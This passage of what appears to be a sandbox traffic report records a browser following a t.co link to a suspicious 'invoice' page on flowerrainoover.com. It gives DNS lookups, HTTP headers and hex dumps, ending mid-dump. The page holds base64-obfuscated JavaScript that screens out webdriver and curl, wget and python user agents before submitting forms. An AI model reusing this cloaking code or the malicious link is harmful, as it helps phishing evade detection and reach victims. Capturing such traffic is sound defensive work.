                                    Nov 27, 2024 23:06:47.626904011 CET6284853192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:47.627094984 CET5466953192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:47.729418039 CET53623201.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:47.730267048 CET53532421.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:47.769264936 CET53628481.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:47.769275904 CET53546691.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:49.889767885 CET5818453192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:49.889981985 CET6203653192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:50.030946970 CET53581841.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:50.031322956 CET53620361.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:55.212244987 CET53575641.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:57.114700079 CET53516441.1.1.1192.168.2.16
                                    Nov 27, 2024 23:07:14.069494963 CET53654661.1.1.1192.168.2.16
                                    Nov 27, 2024 23:07:35.440397024 CET53632721.1.1.1192.168.2.16
                                    Nov 27, 2024 23:07:36.541578054 CET53569721.1.1.1192.168.2.16
                                    Nov 27, 2024 23:07:41.003472090 CET138138192.168.2.16192.168.2.255
                                    Nov 27, 2024 23:08:06.156112909 CET53631391.1.1.1192.168.2.16
                                    TimestampSource IPDest IPChecksumCodeType
                                    Nov 27, 2024 23:08:05.388006926 CET192.168.2.161.1.1.1c23f(Port unreachable)Destination Unreachable
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Nov 27, 2024 23:06:36.275388956 CET192.168.2.161.1.1.10xf409Standard query (0)t.coA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:36.275747061 CET192.168.2.161.1.1.10x79c5Standard query (0)t.co65IN (0x0001)false
                                    Nov 27, 2024 23:06:38.393116951 CET192.168.2.161.1.1.10x5944Standard query (0)flowerrainoover.comA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:38.393357992 CET192.168.2.161.1.1.10x1e1dStandard query (0)flowerrainoover.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:40.170015097 CET192.168.2.161.1.1.10xdd1eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:40.170145988 CET192.168.2.161.1.1.10x8f2Standard query (0)www.google.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:41.885157108 CET192.168.2.161.1.1.10xea2fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:41.885309935 CET192.168.2.161.1.1.10x7435Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:45.240921021 CET192.168.2.161.1.1.10xf7dfStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:45.241091013 CET192.168.2.161.1.1.10x3713Standard query (0)code.jquery.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:47.587229013 CET192.168.2.161.1.1.10x414cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.587368011 CET192.168.2.161.1.1.10xe10cStandard query (0)code.jquery.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:47.626904011 CET192.168.2.161.1.1.10x116dStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.627094984 CET192.168.2.161.1.1.10x213Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                    Nov 27, 2024 23:06:49.889767885 CET192.168.2.161.1.1.10x9430Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:49.889981985 CET192.168.2.161.1.1.10x50aaStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 27, 2024 23:06:36.416260958 CET1.1.1.1192.168.2.160xf409No error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:36.416260958 CET1.1.1.1192.168.2.160xf409No error (0)t.co172.66.0.227A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:38.735482931 CET1.1.1.1192.168.2.160x1e1dNo error (0)flowerrainoover.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:38.735769987 CET1.1.1.1192.168.2.160x5944No error (0)flowerrainoover.com172.67.157.254A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:38.735769987 CET1.1.1.1192.168.2.160x5944No error (0)flowerrainoover.com104.21.66.86A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:40.311295986 CET1.1.1.1192.168.2.160xdd1eNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:40.311342001 CET1.1.1.1192.168.2.160x8f2No error (0)www.google.com65IN (0x0001)false
                                    Nov 27, 2024 23:06:42.029949903 CET1.1.1.1192.168.2.160xea2fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:45.384876966 CET1.1.1.1192.168.2.160xf7dfNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:45.384876966 CET1.1.1.1192.168.2.160xf7dfNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:45.384876966 CET1.1.1.1192.168.2.160xf7dfNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:45.384876966 CET1.1.1.1192.168.2.160xf7dfNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.730267048 CET1.1.1.1192.168.2.160x414cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.730267048 CET1.1.1.1192.168.2.160x414cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.730267048 CET1.1.1.1192.168.2.160x414cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.730267048 CET1.1.1.1192.168.2.160x414cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:47.769264936 CET1.1.1.1192.168.2.160x116dNo error (0)upload.wikimedia.org185.15.58.240A (IP address)IN (0x0001)false
                                    Nov 27, 2024 23:06:50.030946970 CET1.1.1.1192.168.2.160x9430No error (0)upload.wikimedia.org185.15.58.240A (IP address)IN (0x0001)false
                                    • t.co
                                    • https:
                                      • flowerrainoover.com
                                      • code.jquery.com
                                    • a.nel.cloudflare.com
                                    • fs.microsoft.com
                                    • slscr.update.microsoft.com
                                    • upload.wikimedia.org
                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.1649699199.232.214.17280
                                    TimestampBytes transferredDirectionData
                                    Nov 27, 2024 23:06:30.854754925 CET441INHTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 7796
                                    Cache-Control: public,max-age=900
                                    Content-Type: application/vnd.ms-cab-compressed
                                    Last-Modified: Fri, 02 Jun 2017 17:39:05 GMT
                                    ETag: "80424021c7dbd21:0"
                                    Accept-Ranges: bytes
                                    Date: Wed, 27 Nov 2024 22:06:30 GMT
                                    Via: 1.1 varnish
                                    Age: 263
                                    X-Served-By: cache-ewr-kewr1740023-EWR
                                    X-Cache: HIT
                                    X-Cache-Hits: 1788
                                    X-Timer: S1732745191.701787,VS0,VE0
                                    X-CID: 3
                                    X-CCC: US
                                    Nov 27, 2024 23:06:30.854823112 CET1236INData Raw: 4d 53 43 46 00 00 00 00 74 1e 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 49 00 00 00 01 00 01 00 98 45 00 00 00 00 00 00 00 00 c2 4a d0 52 20 00 70 69 6e 72 75 6c 65 73 2e 73 74 6c 00 ab 3e 4e 16 23 1e 98 45 43
                                    Data Ascii: MSCFt,IEJR pinrules.stl>N#ECK[TOl$)VavdH&DYA,(+YAc]"ka-XWIw|9{|dvTwTMZ|)FrtAmfT*nz:
                                    Nov 27, 2024 23:06:30.854965925 CET1236INData Raw: 11 39 70 3c 5e 0e a3 6c 04 42 25 ca 8b 6e b7 40 6f c0 90 8d 84 87 0b f9 e4 89 1d f7 8b cf 90 3d e9 81 8c e7 11 86 50 41 49 0d 0c af 50 d4 50 5d 0e 4a 4d 33 99 01 11 89 99 0a e6 3e c0 83 74 4a a7 42 92 ad 7a 3b 23 c9 1e 42 21 62 58 20 25 5b a2 38
                                    Data Ascii: 9p<^lB%n@o=PAIPP]JM3>tJBz;#B!bX %[8zpV)PuWu`0DO*@;twJHazT<9g_W.LQo+V (I;*Qq(8(9C4FBRX%SmIXL
                                    Nov 27, 2024 23:06:30.854978085 CET1236INData Raw: f1 fd bc c3 47 56 2f d3 d9 7d 4d 11 92 ba de 82 fa 2a ce 66 b6 75 cd bb df 57 af c4 71 29 bb da 82 23 a5 f8 df f8 f8 b7 da f6 9b e6 3a ac 6d c8 5e df dc 73 27 0d b4 b4 98 a7 b6 0b ca c2 36 b9 5e d3 d9 38 23 77 16 c0 64 54 bf 7d 7a b7 d8 70 b0 a9
                                    Data Ascii: GV/}M*fuWq)#:m^s'6^8#wdT}zpq7Ez=DV2%z_-&SZSI2-q<}tlzp#Lc7c5=S~Q>N7p4cwM+V2<B%@)?O4i')SzF
                                    Nov 27, 2024 23:06:30.854990959 CET1236INData Raw: 35 6a 77 2c 4d 97 d4 19 8c 20 9d a9 c8 57 86 45 22 52 21 16 4f 50 27 e8 0d e2 31 c0 f1 74 f7 e4 80 04 75 b6 dd f2 88 db ff 10 82 ff 1a 4b 6e a6 e5 e4 86 f2 6e 9a 62 d2 f3 3f e7 cf df 48 bd 5f 78 37 23 13 76 d6 7e e8 2d 3a 3d 66 40 d9 e5 e2 89 4e
                                    Data Ascii: 5jw,M WE"R!OP'1tuKnnb?H_x7#v~-:=f@N>4QI76M{I"z5;s~.U/5]:_pPsD<~&w}T;jlE8NsgRht*<aq5#_-|K3/$*
                                    Nov 27, 2024 23:06:30.855247974 CET1236INData Raw: 50 ad e7 5e 36 1a a3 5f ef 4c f6 6f 72 fd 9f ea cd 3b a8 a9 6c 0d e0 12 c2 02 52 82 a8 08 a8 a1 69 42 31 78 93 40 08 9d d0 7b 51 8a 04 51 e0 11 8a b4 27 20 a8 20 48 58 10 e9 5d 7a 95 22 2d 02 22 a8 20 45 25 2a 44 11 90 22 5d ba 20 75 41 10 90 17
                                    Data Ascii: P^6_Lor;lRiB1x@{QQ' HX]z"-" E%*D"] uApuu}owfwf?w9s;wN Q\LyW(}'58u1dK/6;4r!nvjZvEb,i^X)sHYK(bu:w=gU/c
                                    Nov 27, 2024 23:06:30.855268002 CET1236INData Raw: e9 cc fc 27 c6 85 23 94 1a 96 63 a5 87 b0 52 3f 74 b4 9a 11 0f c5 0e 40 d6 49 e3 a9 52 52 cc ed e9 5e 42 bc 70 8b d7 b3 eb 2f ea 75 6e 56 d9 ea 02 44 7a 16 2a 24 96 be 2a aa 63 f4 36 1b e8 bf 61 43 d0 df b2 ef a2 00 e0 f3 46 2b f4 47 3c 76 0b 11
                                    Data Ascii: '#cR?t@IRR^Bp/unVDz*$*c6aCF+G<v6"%c[7Q$5G`-,]nZgtjMrZhnQ>W2tM2,Nq)wS+l;ga*/4.AdTl,SF1$e\2q
                                    Nov 27, 2024 23:06:30.855278969 CET380INData Raw: 56 37 47 43 5e 06 64 05 06 9f 8f 2c bd d2 b1 a7 cd 00 fa e6 f4 78 73 07 3b 9b 47 7e 89 5e 4c 85 f5 b3 9a f7 bd 6b 48 22 08 4f dd a5 8d b7 2d 3e f1 9f c0 92 ef aa db 0e f9 cb f0 8b de 3a 40 fe a2 eb 5c e0 9f 2f ed fd c6 ed bf fa 21 70 7c a7 db f3
                                    Data Ascii: V7GC^d,xs;G~^LkH"O->:@\/!p|yIKwV"4T] DaIhhlXMtm:kaYdh<_l5B'e`zc_0E/iu:zY'Fq\B1uol:^0*uBO


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.1649705162.159.140.2294437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:37 UTC657OUTGET /nq9BYOxCg9 HTTP/1.1
                                    Host: t.co
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:38 UTC1103INHTTP/1.1 200 OK
                                    Date: Wed, 27 Nov 2024 22:06:38 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    perf: 7402827104
                                    vary: Origin
                                    expires: Wed, 27 Nov 2024 22:11:38 GMT
                                    Set-Cookie: muc=d77204d9-acd8-45fb-83ef-1e81caf3b041; Max-Age=63072000; Expires=Fri, 27 Nov 2026 22:06:38 GMT; Domain=t.co; Secure; SameSite=None
                                    Cache-Control: private,max-age=300
                                    x-transaction-id: ef5b31a2119cd49e
                                    x-xss-protection: 0
                                    strict-transport-security: max-age=0
                                    x-response-time: 13
                                    x-connection-hash: ddaac8266d05e276e6936ae3ad66bd9fc09683aca99497e57b5a39e75d83845c
                                    CF-Cache-Status: DYNAMIC
                                    Set-Cookie: muc_ads=d77204d9-acd8-45fb-83ef-1e81caf3b041; Max-Age=63072000; Expires=Fri, 27 Nov 2026 22:06:38 GMT; Path=/; Domain=t.co; Secure; SameSite=None
                                    Set-Cookie: __cf_bm=7k9wIJyQ9Rh1.JTYNYuXM9j8NCtOnGw8Jbrs3DV7P4o-1732745198-1.0.1.1-QZbALot9PBYic8hL4Cc_8LQQok_MRCNIgYGzoQZ.QavC2kQxL64nChOHTyRPHK9_oyDFL73mL6joH6GhkQCHyA; path=/; expires=Wed, 27-Nov-24 22:36:38 GMT; domain=.t.co; HttpOnly; Secure; SameSite=None
                                    Server: cloudflare tsa_b
                                    CF-RAY: 8e956d2f7aa8421d-EWR
                                    2024-11-27 22:06:38 UTC266INData Raw: 31 31 37 0d 0a 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 66 6c 6f 77 65 72 72 61 69 6e 6f 6f 76 65 72 2e 63 6f 6d 2f 2e 64 6c 6b 2f 69 6e 76 2e 68 74 6d 6c 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 66 6c 6f 77 65 72 72 61 69 6e 6f 6f 76 65 72 2e 63 6f 6d 2f 2e 64 6c 6b 2f 69 6e 76 2e 68 74 6d 6c 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 20 3d 20 6e 75 6c 6c 3b 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 6c 6f 77 65 72 72 61 69 6e 6f 6f 76 65 72 2e 63
                                    Data Ascii: 117<head><noscript><META http-equiv="refresh" content="0;URL=https://flowerrainoover.com/.dlk/inv.html"></noscript><title>https://flowerrainoover.com/.dlk/inv.html</title></head><script>window.opener = null; location.replace("https:\/\/flowerrainoover.c
                                    2024-11-27 22:06:38 UTC20INData Raw: 6e 76 2e 68 74 6d 6c 22 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                    Data Ascii: nv.html")</script>
                                    2024-11-27 22:06:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.1649712172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:41 UTC685OUTGET /.dlk/inv.html HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Referer: https://t.co/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:41 UTC1351INHTTP/1.1 503 Service Temporarily Unavailable
                                    Date: Wed, 27 Nov 2024 22:06:41 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Set-Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; path=/; expires=Thu, 28-Nov-24 22:06:40 GMT; Max-Age=86400;
                                    Set-Cookie: lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; path=/; expires=Thu, 28-Nov-24 22:06:40 GMT; Max-Age=86400;
                                    Set-Cookie: -q9GqergfbWghlAaztMDrMKaTWU=1732831600; path=/; expires=Thu, 28-Nov-24 22:06:40 GMT; Max-Age=86400;
                                    Set-Cookie: rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; path=/; expires=Thu, 28-Nov-24 22:06:40 GMT; Max-Age=86400;
                                    X-Frame-Options: SAMEORIGIN
                                    Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Pragma: no-cache
                                    Expires: 0
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fcO%2BJovCTSTgVywej%2BfZgIFS91BxdD9wqiUCdSYsWuYMKflvY4bfVt%2F9QlWQVyXQuLDaRJkGH5pjBSmxeP0ynVXMX9LDXYN%2Bw3C5%2BLDJ9hVTO78y6Ble8xorMbNbhracfu0SJwUv"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956d45cf718ce2-EWR
                                    2024-11-27 22:06:41 UTC246INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 39 31 26 6d 69 6e 5f 72 74 74 3d 31 37 37 38 26 72 74 74 5f 76 61 72 3d 36 39 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 35 31 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 36 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 35 30 37 31 36 26 63 77 6e 64 3d 32 30 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 33 63 35 62 34 31 63 35 63 30 66 35 33 63 37 26 74 73 3d 36 32 30 26 78 3d 30 22 0d 0a 0d 0a
                                    Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1778&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1263&delivery_rate=1550716&cwnd=202&unsent_bytes=0&cid=63c5b41c5c0f53c7&ts=620&x=0"
                                    2024-11-27 22:06:41 UTC1369INData Raw: 31 64 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                    Data Ascii: 1d05<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                    2024-11-27 22:06:41 UTC1369INData Raw: 62 69 67 70 49 48 74 30 63 6e 6c 37 63 6d 56 30 64 58 4a 75 49 43 45 68 64 32 6c 75 5a 47 39 33 4c 6d 46 6b 5a 45 56 32 5a 57 35 30 54 47 6c 7a 64 47 56 75 5a 58 4a 39 49 47 4e 68 64 47 4e 6f 4b 47 55 70 49 48 74 79 5a 58 52 31 63 6d 34 67 49 54 46 39 49 48 30 73 43 69 41 67 49 43 41 67 49 43 41 67 59 69 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 49 73 49 47 4d 70 49 48 74 68 4b 43 6b 67 50 79 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 4a 45 54 30 31 44 62 32 35 30 5a 57 35 30 54 47 39 68 5a 47 56 6b 49 69 77 67 59 69 77 67 59 79 6b 67 4f 69 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 64 48 52 68 59 32 68 46 64 6d 56 75 64 43 67 69 62 32 35 79 5a 57 46 6b 65 58 4e 30 59 58 52 6c 59 32 68
                                    Data Ascii: bigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2h
                                    2024-11-27 22:06:41 UTC1369INData Raw: 47 39 74 59 58 52 70 62 32 34 67 5a 48 4a 70 64 6d 56 79 4b 69 38 4b 61 57 59 6f 49 58 64 70 62 6d 52 76 64 79 35 6b 62 32 4e 31 62 57 56 75 64 43 35 6b 62 32 4e 31 62 57 56 75 64 45 56 73 5a 57 31 6c 62 6e 51 75 5a 32 56 30 51 58 52 30 63 6d 6c 69 64 58 52 6c 4b 43 4a 33 5a 57 4a 6b 63 6d 6c 32 5a 58 49 69 4b 53 6c 37 43 69 38 71 61 57 59 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 6c 37 4b 69 38 4b 61 57 59 6f 49 53 39 69 62 33 52 38 59 33 56 79 62 48 78 72 62 32 52 70 66 48 68 69 62 57 4e 38 64 32 64 6c 64 48 78 31 63 6d 78 73 61 57 4a 38 63 48 6c 30 61 47 39 75 66 48 64 70 62 6d 68 30 64 48 42 38 61 48 52 30 63 6d 46 6a 61 33 78 68 62 47 56 34 59 58 78 70 59 56 39 68 63 6d 4e 6f 61 58 5a 6c 63 6e 78 6d 59 57 4e 6c
                                    Data Ascii: G9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNl
                                    2024-11-27 22:06:41 UTC1369INData Raw: 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 6d 39 79 62 58 4e 62 4d 46 30 75 63 33 56 69 62 57 6c 30 4b 43 6b 37 43 69 41 67 66 53 42 6c 62 48 4e 6c 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 67 68 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6d 68 68 63 32 67 70 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 6f 63
                                    Data Ascii: AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5oc
                                    2024-11-27 22:06:41 UTC1369INData Raw: 70 64 47 67 6e 4c 43 41 6e 57 45 31 4d 53 48 52 30 63 46 4a 6c 63 58 56 6c 63 33 51 6e 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 47 68 30 64 48 41 75 63 32 56 30 55 6d 56 78 64 57 56 7a 64 45 68 6c 59 57 52 6c 63 69 67 6e 57 43 31 53 5a 58 46 31 5a 58 4e 30 5a 57 51 74 56 47 6c 74 5a 56 4e 30 59 57 31 77 4a 79 77 67 4a 79 63 70 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 34 61 48 52 30 63 43 35 7a 5a 58 52 53 5a 58 46 31 5a 58 4e 30 53 47 56 68 5a 47 56 79 4b 43 64 59 4c 56 4a 6c 63 58 56 6c 63 33 52 6c 5a 43 31 55 61 57 31 6c 55 33 52 68 62 58 41 74 52 58 68 77 61 58 4a 6c 4a 79 77 67 4a 79 63 70 4f 77 6f 67 49 43 41 67 49 43
                                    Data Ascii: pdGgnLCAnWE1MSHR0cFJlcXVlc3QnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtVGltZVN0YW1wJywgJycpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAtRXhwaXJlJywgJycpOwogICAgIC
